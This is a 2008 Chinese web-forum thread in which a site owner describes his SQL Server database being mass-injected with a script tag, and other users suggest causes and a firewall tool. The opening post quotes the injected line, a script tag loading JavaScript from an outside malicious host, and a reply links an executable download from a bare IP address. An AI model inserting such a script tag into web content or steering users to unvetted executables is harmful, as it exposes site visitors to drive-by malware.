找回密码
 立即注册
搜索
查看: 609|回复: 5

被挂马了,郁闷

[复制链接]

126

主题

1015

回帖

1510

积分

金牌会员

歪脖

积分
1510
发表于 2008-12-18 17:19:13 | 显示全部楼层 |阅读模式
win2003+sql2000环境,数据库中很多字段被加上代码
  1. <Script Src=http://c.nuclear3%2E%63om/css/c.js></Script>
复制代码
查看网上,解决办法不多,有个软件是安全伞企业版,需要注册才能使用。

郁闷:{

安全伞2009企业版可以有效解决类似变相注入问题

官方下载:http://121.207.254.246/safe3.rar
色驴杂货铺开张啦!欢迎光临!

真希望人民币快快升值,这样我就可以去美国买made in china的东西了

1138

主题

2万

回帖

3万

积分

管理员

几凡失意仍能傲!

积分
30552
发表于 2008-12-18 17:26:45 | 显示全部楼层
你确定是数据库中?

也可能是局域网中一台机器中招,攻击交换机,导致从交换机出去的所有http的页面都加在有这种代码。以前遇到过一次,只要通过交换机查找到那台机器就知道了。
回复

使用道具 举报

发表于 2008-12-18 18:05:53 | 显示全部楼层
该软件是收费的,但为了广大用户免受其害,可以下载后直接运行安全伞目录下的inu.exe,防火墙则被安装并且无限制使

[ 本帖最后由 星之所在 于 2008-12-18 18:13 编辑 ]
回复

使用道具 举报

126

主题

1015

回帖

1510

积分

金牌会员

歪脖

积分
1510
 楼主| 发表于 2008-12-18 21:06:33 | 显示全部楼层
运行inu.exe了,这是IIS防火墙,好像没有作用

我打开数据库看了,原来被修改的数据库字段该有的还有,数据库的文字型字段均受影响,只能用查询批量删除字段中的代码,至于怎么来的,还是没弄明白。

文字录入使用的是fckeditor,但是在编辑文章的时候,居然在html页面的源代码中,编辑框代码中发现这段注入代码,怀疑fckeditor有漏洞?
色驴杂货铺开张啦!欢迎光临!

真希望人民币快快升值,这样我就可以去美国买made in china的东西了
回复

使用道具 举报

1138

主题

2万

回帖

3万

积分

管理员

几凡失意仍能傲!

积分
30552
发表于 2008-12-18 22:55:48 | 显示全部楼层
如果是数据库里有,那就是本机系统里有啥漏洞了。
回复

使用道具 举报

126

主题

1015

回帖

1510

积分

金牌会员

歪脖

积分
1510
 楼主| 发表于 2008-12-19 19:50:03 | 显示全部楼层
是sql注入,嘿嘿,程序都是小弟自己写的,漏洞多多的。;*
色驴杂货铺开张啦!欢迎光临!

真希望人民币快快升值,这样我就可以去美国买made in china的东西了
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|海浩社区

GMT+8, 2025-9-14 17:27 , Processed in 0.080800 second(s), 21 queries .

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表